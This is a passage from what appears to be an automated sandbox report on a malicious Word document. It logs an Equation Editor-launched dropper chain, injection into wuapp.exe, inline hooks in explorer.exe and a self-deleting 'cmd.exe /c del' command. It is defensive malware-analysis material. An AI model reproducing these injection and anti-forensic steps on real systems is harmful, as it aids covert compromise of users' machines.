          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C0276
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C1A6F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C4CC4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009BAC14
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C2D97
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C0D53
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C3659
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B5FCE
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C07E1
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F0A64
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00401026
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E261
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041EB71
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E3DA
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E4B4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409E4B
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409E50
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041EEB5
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D7DE
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E79A
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C0276
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C1A6F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C4CC4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009BAC14
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C2D97
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C0D53
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C3659
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009B5FCE
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C07E1
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A0E0C6
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A3D005
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A13040
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A2905A
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A0E2E9
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00AB1238
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00AB63BF
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A0F3CF
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A363DB
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A12305
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A5A37B
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A17353
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A45485
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A21489
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A9443E
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A4D47D
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A2C5F0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A1351F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A56540
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A14680
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A1E6C1
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_02011238
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6E0C6
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F8905A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F73040
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F9D005
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F963DB
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6F3CF
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FBA37B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F77353
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F72305
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6E2E9
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F8C5F0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_02012622
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7351F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F81489
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA5485
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA57C3
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7C7BC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FF579A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7E6C1
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F74680
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F869FE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F729B2
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_02023A83
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FF5955
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F9286D
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0201CBA4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7C85C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FFDBDA
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0200F8EE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F97B00
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0201098E
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7CD5B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA0D3B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F9DF7C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F80F3F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F8EE4C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA2E2F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0200FDDD
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AE79A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD7DE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AEB71
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00092D90
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00099E4B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00099E50
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AEEB5
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00092FB0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 009B2233 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 00A0DF5C appears 51 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 00A53F92 appears 51 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 00A5373B appears 87 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 009AF1E0 appears 48 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01FDF970 appears 81 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01F6DF5C appears 107 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01F6E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01FB373B appears 238 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01FB3F92 appears 108 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A350 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A400 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A480 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A34A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A3FB NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A47B NtClose,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A000C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A00078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A00048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A010D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A00060 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A001D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A0010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A01148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F600C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F607AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F601D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F61148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F610D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F61930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F61D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA350 NtCreateFile,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA400 NtReadFile,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA480 NtClose,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA530 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA34A NtCreateFile,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA3FB NtReadFile,
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA47B NtClose,
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe 78C9548A33ABD68ED553BB2A48166AFD21041B9D868A0373E4A11B93409DB049
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Windows\SysWOW64\wuapp.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\wuapp.exeMemory allocated: 77740000 page execute and read and write
          Source: Revised RFQ-PO180911.docVirustotal: Detection: 31%
          Source: Revised RFQ-PO180911.docReversingLabs: Detection: 32%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
          Source: C:\Windows\SysWOW64\wuapp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Windows\SysWOW64\wuapp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
          Source: C:\Users\user\AppData\Roaming\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$vised RFQ-PO180911.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6029.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@11/14@5/3
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00402078 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
          Source: Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drInitial sample: OLE indicators vbamacros = False
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_009061EC push FFFFFFF0h; ret
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00906330 push FFFFFFF0h; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009AF225 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E9E6 push edx; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00416B6D push ebx; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D4F2 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D4FB push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D4A5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D55C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041EEB5 push esi; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009AF225 push ecx; ret
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD4A5 push eax; ret
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD4FB push eax; ret
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD4F2 push eax; ret
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD55C push eax; ret
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AE9E6 push edx; ret
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000A6B6D push ebx; ret
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AEEB5 push esi; ret
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Roaming\word.exeFile created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
